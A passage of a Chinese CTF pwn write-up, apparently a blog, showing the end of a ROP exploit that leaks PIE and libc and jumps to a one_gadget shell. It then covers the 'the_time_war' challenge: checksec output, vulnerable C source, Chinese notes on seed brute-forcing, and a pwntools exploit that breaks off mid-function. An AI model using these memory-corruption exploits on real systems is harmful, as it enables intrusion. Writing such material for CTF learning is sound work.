class="o">&lt;</span> <span class="mh">0x7</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">move_check</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;s&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">pie_leak</span> <span class="o">=</span> <span class="n">main_leak</span> <span class="o">-</span> <span class="mh">0x1adf</span> </span></span><span class="line"><span class="cl"> <span class="n">leak</span><span class="p">(</span><span class="s1">&#39;pie_leak&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x10</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">move</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;n&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">leave_ret</span> <span class="o">=</span> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x172F</span> </span></span><span class="line"><span class="cl"> <span class="n">rw_addr</span> <span class="o">=</span> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x4910</span> <span class="c1"># history</span> </span></span><span class="line"><span class="cl"> <span class="n">reread</span> <span class="o">=</span> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x164D</span> </span></span><span class="line"><span class="cl"> <span class="n">rop_leak_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="n">rw_addr</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x1480</span><span class="p">,</span> <span class="c1"># leak with printf</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x3F98</span><span class="p">,</span> <span class="c1"># last_item leak puts</span> </span></span><span class="line"><span class="cl"> <span class="n">rw_addr</span> <span class="o">+</span> <span class="mh">0x38</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">reread</span> </span></span><span class="line"><span class="cl"> <span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">write</span><span class="p">(</span><span class="n">rop_leak_chain</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mh">0x10</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rw_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">leave_ret</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">grab</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">uru64</span><span class="p">()</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">leak</span><span class="p">(</span><span class="s1">&#39;libc.address&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">xor_rax_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0xc75e9</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rbp_ret</span> <span class="o">=</span> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x1233</span> </span></span><span class="line"><span class="cl"> <span class="n">one_gadget</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0xef52b</span> </span></span><span class="line"><span class="cl"> <span class="n">rop_break_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="n">xor_rax_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rbp_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pie_leak</span> <span class="o">+</span> <span class="mh">0x6000</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">one_gadget</span> </span></span><span class="line"><span class="cl"> <span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">sl</span><span class="p">(</span><span class="n">rop_break_chain</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">itr</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x583ec posix_spawn(rsp+0xc, &#34;/bin/sh&#34;, 0, rbx, rsp+0x50, environ)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rsp+0x68 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rsp &amp; 0xf == 0</span> </span></span><span class="line"><span class="cl"><span class="c1"># rax == NULL || {&#34;sh&#34;, rax, rip+0x17301e, r12, ...} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># rbx == NULL || (u16)[rbx] == NULL</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x583f3 posix_spawn(rsp+0xc, &#34;/bin/sh&#34;, 0, rbx, rsp+0x50, environ)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rsp+0x68 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rsp &amp; 0xf == 0</span> </span></span><span class="line"><span class="cl"><span class="c1"># rcx == NULL || {rcx, rax, rip+0x17301e, r12, ...} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># rbx == NULL || (u16)[rbx] == NULL</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0xef4ce execve(&#34;/bin/sh&#34;, rbp-0x50, r12)</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rbp-0x48 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rbx == NULL || {&#34;/bin/sh&#34;, rbx, NULL} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># [r12] == NULL || r12 == NULL || r12 is a valid envp</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0xef52b execve(&#34;/bin/sh&#34;, rbp-0x50, [rbp-0x78])</span> </span></span><span class="line"><span class="cl"><span class="c1"># constraints:</span> </span></span><span class="line"><span class="cl"><span class="c1"># address rbp-0x50 is writable</span> </span></span><span class="line"><span class="cl"><span class="c1"># rax == NULL || {&#34;/bin/sh&#34;, rax, NULL} is a valid argv</span> </span></span><span class="line"><span class="cl"><span class="c1"># [[rbp-0x78]] == NULL || [rbp-0x78] == NULL || [rbp-0x78] is a valid envp</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 0x00000000000c75e9: xor rax, rax; ret;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="the_time_war">the_time_war </h2><h3 id="checksec-2">checksec </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[*] &#39;/home/RatherHard/CTF-pwn/LACTF/the_time_war/pwn_the_time_war&#39; </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Partial RELRO </span></span><span class="line"><span class="cl"> Stack: No canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: PIE enabled </span></span><span class="line"><span class="cl"> Stripped: No </span></span></code></pre></td></tr></table> </div> </div><h3 id="code-2">code </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;time.h&gt;</span><span class="cp"> </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">run</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">init</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">setbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">srand</span><span class="p">(</span><span class="n">clock_gettime</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">run</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">short</span> <span class="n">code</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">4</span><span class="p">;</span> <span class="n">i</span> <span class="o">++</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">code</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nf">rand</span><span class="p">()</span> <span class="o">%</span> <span class="mi">16</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;You see a locked box. The dial on the lock reads: %d-%d-%d-%d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">code</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">code</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">code</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">code</span><span class="p">[</span><span class="mi">3</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Which dial do you want to turn? &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="kt">short</span> <span class="n">ind1</span><span class="p">,</span> <span class="n">val1</span><span class="p">,</span> <span class="n">ind2</span><span class="p">,</span> <span class="n">val2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%hd&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ind1</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;What do you want to set it to? &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%hd&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">val1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Second dial to turn? &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%hd&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ind2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;What do you want to set it to? &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">scanf</span><span class="p">(</span><span class="s">&#34;%hd&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">val2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">code</span><span class="p">[</span><span class="n">ind1</span><span class="p">]</span> <span class="o">=</span> <span class="n">val1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">code</span><span class="p">[</span><span class="n">ind2</span><span class="p">]</span> <span class="o">=</span> <span class="n">val2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;The box remains locked.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">init</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="nf">run</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>有两个越界写,可以用来劫持</p> <p>由于有 pie ,第一次劫持的时候需要去爆 1/16</p> <p>这题需要打 libc ,由于随机数种子为 clock_gettime 的地址的低 4 字节,我们可以去根据生成的随机数去爆破种子从而 leak libc 的一部分</p> <p>4 个随机数不够,8 个刚好</p> <p>最后通过伪造栈帧去打 onegadget 即可,不过会碰到缺 libc 的高 4 字节的问题,这一点可以通过把栈上残留值搬到缺失的位置上来解决,需要利用 scanf 解析失败保留原变量值的特性</p> <h3 id="exp-4">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">ctypes</span> <span class="kn">import</span> <span class="n">CDLL</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./pwn_the_time_war_patched&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">glibc</span> <span class="o">=</span> <span class="n">CDLL</span><span class="p">(</span><span class="s1">&#39;libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">13774</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">conn</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">process</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="n">io</span> <span class="o">=</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="n">name</span> <span class="o">+</span> <span class="s1">&#39; = &#39;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">numslot</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"><span class="n">seed</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">change</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">val</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;turn? &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;to? &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">val</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">recvnum</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;lock reads: &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">numslot</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;-&#39;</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]))</span> </span></span><span class="line"><span class="cl"> <span class="n">numslot</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">hijacklow</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">libc_low</span> <span class="o">=</span> <span class="n">seed</span> <span class="o">-</span> <span class="mh">0xcf420</span> <span class="o">+</span> <span class="n">addr</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mh">0x132A</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">libc_low</span> <span class="o">&amp;</span> <span class="mh">0xffff</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mh">0x132A</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">change</span><span class="p">(</span><span class="n">idx</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="p">(</span><span class="n">libc_low</span> <span class="o">&gt;&gt;</span> <span class="mi">16</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xffff</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">global</span> <span class="n">p</span><span class="p">,</span> <span class="n">io</span><span 